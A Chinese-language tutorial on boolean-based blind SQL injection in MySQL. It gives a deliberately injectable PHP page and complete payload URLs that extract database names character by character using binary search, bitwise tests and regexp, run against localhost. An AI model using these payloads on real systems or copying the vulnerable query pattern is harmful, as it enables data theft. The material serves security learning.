2. 程式人生 > >【20】WEB安全學習----MySQL注入-5(布林型盲注)

【20】WEB安全學習----MySQL注入-5(布林型盲注)

阿新 發佈:2019-02-02

布林型盲注例子演示:

本次程式碼不輸出具體的查詢記錄結果,如果存在ID值則輸出一個狀態,不存在ID值則輸出另一個狀態,也不會輸出SQL報錯狀態,為布林型盲注。

<?php
    header('content-type:text/html;charset=utf-8');
    @$id=$_GET['id'];  //傳參
    if(!isset($id)){
        die('請傳入GET方法id引數值');
    }
    $mysqli=new mysqli();
    $mysqli->connect('localhost','root','root');
    if($mysqli->connect_errno){
        die('連線資料庫失敗:'.$mysqli->connect_error);
    }
    $mysqli->select_db('user');
    if($mysqli->errno){
        die('開啟資料庫失敗:'.$mysqli->error);
    }
    $mysqli->set_charset('utf8');
    $sql="SELECT username,passwd FROM users WHERE id={$id} limit 0,1";  //添加了limit語句
    $result=$mysqli->query($sql);
    if(!$result){
        //die('執行SQL語句失敗:'.$mysqli->error);
    }else if($result->num_rows==0){
        echo '抱歉!不存在此記錄';
    }else {
        echo '存在此記錄';
    }

注入步驟

判斷注入點:

判斷注入點同樣可以進行運算子操作,檢視是否執行了運算

判斷欄位數:

邏輯判斷注入:

因為不返回查詢結果資訊,所以不能直接進行查詢,但是可以通過條件語句進行邏輯判斷猜解。

檢視當前資料庫版本:通過邏輯比較得知,資料庫版本為5

二分搜尋法進行猜解

猜解information_schema.schemata表裡第二行記錄的第一個字元為’f

http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>64,1,0)%23 存在此記錄
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>128,1,0)%23 不存在此記錄
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>96,1,0)%23 存在此記錄
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>112,1,0)%23 不存在此記錄
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>104,1,0)%23 不存在此記錄
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>100,1,0)%23 存在此記錄
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>102,1,0)%23 不存在此記錄
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>101,1,0)%23 存在此記錄
x>101 and x<102 所以x=102

102對應的正是字元f

但是,不知道欄位值什麼時候結束,所以首先需要取當前欄位值的長度。

http://localhost/index.php?id=1 and if(length((select schema_name from information_schema.schemata limit 1,1))=4,1,0)%23 存在此記錄

按位比較法進行猜解

http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 64,1,0)%23 存在此記錄 1
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 32,1,0)%23 存在此記錄 1
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 16,1,0)%23 不存在此記錄 0
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 8,1,0)%23 不存在此記錄 0
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 4,1,0)%23 存在此記錄 1
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 2,1,0)%23 存在此記錄 1
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 1,1,0)%23 不存在此記錄 0
1100110轉換到十進位制為102

102對應的正是字元f

正則表示式法進行猜解

http://localhost/index.php?id=1 and if((select schema_name from information_schema.schemata limit 1,1) regexp '^f',1,0)%23 是否以字元f開頭  存在此記錄
http://localhost/index.php?id=1 and if(mid((select schema_name from information_schema.schemata limit 1,1),1,1) regexp '[a-g]',1,0)%23 第一個字元是否在a-g中
......以此類推

相關推薦

20WEB安全學習----MySQL注入-5(布林)

布林型盲注例子演示: 本次程式碼不輸出具體的查詢記錄結果,如果存在ID值則輸出一個狀態,不存在ID值則輸出另一個狀態,也不會輸出SQL報錯狀態,為布林型盲注。 <?php header('content-type:text/html;charset=utf-

19WEB安全學習----MySQL注入-4

一、盲注介紹 開發人員一般禁用了所有的詳細錯誤訊息,如果發現了一個SQL注入點,但應用只提供了一個通用的錯誤頁面;或者返回正常頁面但沒有我們需要的內容在上面。這些都屬於SQL盲注,沒有錯誤訊息或反饋內容就不能使用之前的注入方法,而是採用SQL邏輯操作以位元組方式推斷資料來修

22WEB安全學習----MySQL注入-7(繞過限制)

註釋符:-- 、#、/**/繞過 只能閉合後面的語句,使其成為正確的SQL語句。 $sql="SELECT username FROM users WHERE id='{$id}' limit 0,1;" $id=-1' union select version() '

13WEB安全學習----MYSQL-3

目錄 隱式轉換: 顯式轉換: IF 函式與操作符 一、型別轉換 隱式轉換: 當運算子與不同型別的運算元一起使用時,會發生型別轉換以使運算元相容。某些轉換是隱式發生的。例如,MySQL會根據需要自動將數字轉換為字串,反之亦然。

28WEB安全學習----SQL注入總結

檢測注入 不管什麼資料庫注入,檢測是否有注入點是第一步,而檢測的方法大同小異。 1、閉合SQL拼接語句 要想進行下一步注入,首先需要閉合SQL語句,如何知道閉合符號是什麼呢?可通過在引數後面加入單引號或雙引號使其整條SQL拼接語句失敗,從而可從資料庫報錯資訊得知,若沒有

29WEB安全學習----XML注入

一、XML基礎 簡介: XML:可擴充套件標記語言。XML被設計用來是傳輸和儲存資料,XML是一種“元標記”語言,開發者可以根據自己的需要建立標記的名稱。 XML結構 XML是一種樹結構,從“根部”開始,然後擴充套件到“枝葉”,XML文件必須有根元素。 <?x

31WEB安全學習----XPath注入

一、XPath簡介 XPath 是一門在 XML 文件中查詢資訊的語言。可以理解xml為資料庫,xpath就是查詢資料庫的SQL語言。 XPath 使用路徑表示式在 XML 文件中進行導航 XPath 包含一個標準函式庫 XPath 是 XSLT 中的主要元素 XP

32WEB安全學習----Json注入

一、Json簡介 JSON 是儲存和交換文字資訊的語法,是輕量級的文字資料交換格式。類似xml,但JSON 比 XML 更小、更快,更易解析。所以現在介面資料傳輸都採用json方式進行。JSON 文字的 MIME 型別是 "application/json"。 json語

27WEB安全學習----SQL server注入

一、基礎知識 系統資料庫 master資料庫 master是SQL server最重要的資料庫,是整個資料庫的核心,使用者不能直接修改。裡面資料庫包括使用者的登陸資訊、使用者所在的組、所有系統的配置選項、伺服器中本地資料庫的名稱和資訊、初始化方式等。 model資

45WEB安全學習----JAVA基礎二

一、類與物件 1、構造方法 作用:可以通過構造方法實現例項化物件中的屬性初始化處理。若類中沒有自己定義構造方法,JAVA會預設提供一個無參、什麼都不做的構造方法。 定義:方法名稱必須和類名稱保持一致、不允許設定任何的返回值型別、是在使用關鍵字new例項化物件時自動呼叫。 構造方法過載

44WEB安全學習----JAVA基礎一

前言: 為什麼做滲透測試需要學習JAVA?自己的見解: 1、目前國內大中型企業專案多數採用JAVAEE開發,而在日常安全服務工作中,百分之八十的專案也是JAVA所開發,所以需要學習JAVA(達到會分析會寫,而不是之前學習PHP那樣會分析就行,因為PHP的特性,所以用來打CTF的挺多)。

43WEB安全學習----PHP-ThinkPHP框架2

模板常量替換機制 __MODULE__:表示從域名後面開始一直到分組名結束的路由 __CONTROLLER__:表示從域名後面開始一直到控制器結束的路由 __ACTION__:表示從域名後面開始一直到方法名結束的路由 __PUBLIC__:站點根目錄下的public目錄路由 _

42WEB安全學習----PHP-ThinkPHP框架1

前言 前不久參加了一個CTF比賽,有一道題是PHP程式碼審計,採用框架進行開發,因為從沒有接觸過框架學習,故找到了漏洞程式碼也不知道怎麼構造利用,悲慘之極,現在惡補下。 PHP框架 在PHP中,目前主流的框架有: Zend Framework:重量級框架,由PHP官方出品,因為功能較

46WEB安全學習----JAVA基礎三

一、String類 在JAVA中,String字串用雙引號引起來,字串嚴格來說就是字元的陣列集合: 在JDK1.8及以前,String類使用char []字元陣列儲存字串,而1.9及以上使用byte []位元組陣列儲存字串。 1、字串的比較: 字串如果用 "==" 進行比較,比較的是

11WEB安全學習----MYSQL1

目錄 2、表 4、主鍵 1、整數型 2、浮點型 四、建立表 1、建立表 單欄位主鍵 五、修改表 8、刪除表

33WEB安全學習----XSS攻擊1

關於XSS跨站指令碼攻擊有太多文章和教材提供了,本章就簡單介紹XSS攻擊原理,重點介紹XSS程式碼構造和繞過。 一、XSS攻擊原理 XSS攻擊:即跨站指令碼攻擊,是指攻擊者在網頁中嵌入客戶端JavaScript指令碼,當用戶使用瀏覽器瀏覽嵌入惡意程式碼的網頁時,惡意程式碼

34WEB安全學習----XSS攻擊2

一、JavaScript事件 在構造XSS程式碼時,如果對<>進行了編碼或過濾,那麼無法結束和新建HTML元素,此時可以用事件進行觸發(這裡不討論利用HTML標籤屬性值進行觸發,因為只支援少部分瀏覽器)。 JavaScript指令碼中的事件是指使用者載入目標頁

36WEB安全學習----CSRF攻擊

CSRF攻擊 關於CSRF攻擊,網上也有很多講解,這裡就不重複造輪子了。 簡單介紹下,CSRF攻擊也叫跨站點請求偽造攻擊,其核心攻擊原理是:在傳送請求時,瀏覽器會自動附帶使用者的cookie資料進行提交,那麼通過這個原理,攻擊者通過JS構造某些功能請求,如發帖,轉發、修改

37WEB安全學習----SSRF攻擊

一、攻擊原理 SSRF:服務端請求偽造,不要把它和CSRF(跨站點請求偽造)攻擊搞混了哦,CSRF利用的是客戶端請求,而SSRF利用的是伺服器端請求,這個是本質區別。 簡單來說,SSRF攻擊原理是伺服器端請求了來自客戶端構造的連結,這個是不是和CSRF攻擊類似呢,攻擊者構

39WEB安全學習----Jsonp跨域安全

同源策略 同源策略/SOP是一種約定,它是瀏覽器最核心也最基本的安全功能,所謂同源是指"協議+域名+埠"三者相同。 同源策略限制以下幾種行為: 1、Cookie、LocalStorage 和 IndexDB 無法讀取 2、DOM 和 Js物件無法獲得 3、AJA